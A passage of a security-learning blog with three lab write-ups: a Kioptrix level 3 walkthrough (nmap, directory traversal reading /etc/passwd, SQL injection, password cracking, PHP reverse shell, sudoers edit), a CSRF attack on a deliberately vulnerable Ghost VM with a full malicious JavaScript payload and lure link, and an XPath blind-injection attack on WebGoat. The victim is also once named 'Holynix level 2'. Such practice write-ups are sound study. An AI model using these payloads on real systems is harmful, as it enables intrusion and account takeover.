[Learning] Kioptrix level three

Links:

watch the HD video online:   http://vimeo.com/f4l13n5now/kioptrixlevel3

Description:

"This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).
The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges. "
                                                                                                                                        --------- Kioptrix team

Attacker:

Backtrack 5 R2
IP: 192.168.1.2/24

Victim:

Holynix level 2
IP: 192.168.1.18/24

vulnerability & exploit:

1, GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection
2, Remote File Traversal & Local File Inclusion Exploit
3, Arbitrary File Upload Exploit

Attacking tools:

1, nmap
2, SQLMAP
3, Exploit-DB
4, John The Ripper
5, Metasploit

Attacking process:

1, Reconnaissance & Enumeration:
use nmap to sweep the active hosts in the network:
nmap -n 192.168.1.0/24

use NMAP to probe the opening ports and services:

nmap -sS -sV -O 192.168.1.18 -v

found the following services:
[1] HTTP service running on port 80
[2] SSH service running on port 22
 

2, exploit vulnerable services:
[1] exploit the Remote Directory Traversal vulnerability to get users ("/etc/passwd")
[2] exploit the GALLARIFIC PHP Photo Gallery Script (gallery.php) SQL Injection to get users and hashed password
[3] use JTR to crack those passwords
[4] login as administrator and upload php attacking payload and reverse connect to attacker machine (got low privilege) 
or
[5] use cracked account to login to the server via SSH (upgrade to user privilege)
[6] broswering the server system directories and collect information (found the file "CompanyPolicy.README")
[7] change file "/etc/sudoers" to get root privilege ("allocate loneferret with ALL priviliege") 

 

 
Reference:

[1] Kioptrix download link
[2] Tutorial on g0tmi1k's Blog

Play with CSRF

Cross-Site Request Forgery (CSRF/XSRF)

A kind of Injection vulnerability. Used by hacker to exploit the trust that a site has for the authorized user.
More information please check the reference.

Victim:  Ghost VM (XSS & CSRF), admin user on Ghost server
Attacker:  test user on Ghost server

Attacking process:
1, Log in Gost server as admin user

2, submit "<script>alert(1)</script>" to check if there is XSS vulnerability. Of course it has...

3, use WEB Proxy (such as Burp) to check and analyze how the web application is working...
here, we submit test string "abc" and submit.
Burp capture the first request:

Burp capture the second request:

Now we understand how it works:
There are two requests sent to server. So we need to send two requests when write the attacking script.

we construct the malicious java script:

<script>
function test()
{
  var pd="vuln=<h1>Hacked%20by%20F4l13n5n0w&user=admin";
  var xmlhttp=new XMLHttpRequest();
  xmlhttp.onreadystatechange=function() {
    var xmlhttp2=new XMLHttpRequest();
    xmlhttp2.open("GET", "/ghost/iframe.php?page=form.php", true);
    xmlhttp2.send();
  };
  xmlhttp.open("POST", "/ghost/blogView.php", true);
  xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  xmlhttp.send(pd);
}
</script>
Hi admin, Here is a problem. Pls <a href="" onclick="test()">check!</a>

Log in the server as test user and submit the attacking code and then we just waiting for admin to click it.

If the Admin was tricked and click the "check" link. He will submit the sentence "Hacked by F4l13n5n0w" to the server underground.

Have done.


Reference:
[1] http://www.cgisecurity.com/csrf-faq.html
[2] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29
[3] http://www.w3schools.com/ajax/ajax_xmlhttprequest_send.asp

Play with XPATH Blind Explorer

xpath-blind-explorer v1.0 was released On the BlackHat_US 2011.

This is automated tool to explore the whole XML content through using XPATH Injection Vulnerability.

check the following links to get more information:

Demo video:
https://www.youtube.com/watch?v=IDQAj09fBvI&feature=related

Download:
http://code.google.com/p/xpath-blind-explorer/downloads/list


In the demo video, only GET method with one parameter was presented.

How about POST method with multi-parameters?

Let's use it to attack WebGoat XPATH Injection challenge.

Victim:       WebGoat (XPATH Injection Lesson)
Attacker:   Windows with xpath-blind-explorer v1.0

Attacking process:

1, submit the correct/incorrect Username and Password (e.g Mike/test123) to check the difference between responses.




If the username and password is correct, the server will return user's information otherwise will return nothing.
So here we use "468100" as the "true" condition keyword.


2, check source code to find out form's request URL and parameters' name
using firebug, we got the request URL is

http://192.168.235.134/WebGoat/attack?Screen=83&menu=1200

The parameter's name:

Username and Password and SUBMIT


3, Configure XPath Blind Explorer as follow:




Use Burp Proxy (listen at localhost, port 8080) to check how the request was created

Add Session cookie in order to pass the authentication with WebGoat server


4, Now we test condition

test "true" condition:

Let's see the request captured by Burp proxy.




The injection code "'%20and%20'1'='1" just appended at the end of all of parameters (which are URL encoded), That means XPath Blind Explorer treat multi-parameter as only one parameter(Blue Username is parameter's name and Red part is value which was URL encoded).

So now, we need to solve two problems:

1, The injection code only be appended at the end of parameters. So we need to change the order of parameters. Let's put the injectable parameter at the end, such as:

SUBMIT=Submit&Username=Mike&Password=test123


2, Because XPath Blind Explorer treat all parameters as only one parameter, so the parameters will be URL encoded including parameter link mark "&" (which is encoded to "%26", but should not be encoded). So we need to replace it back to "&".

Here we use Burp Proxy's function "match and replace", configure it as follow.


Here regex "(%26)" was used to match keyword.



Right now everything is done~ Let's launch it.

Waiting for several minutes, now we got the whole XML file~

Reference:
[1] http://penetration-testing.7safe.com/the-art-of-exploiting-lesser-known-injection-flaws-revealed-at-black-hat/
[2] http://www.zytrax.com/tech/web/regex.htm
[3] http://www.addedbytes.com/cheat-sheets/regular-expressions-cheat-sheet/
[4] http://www.regextester.com/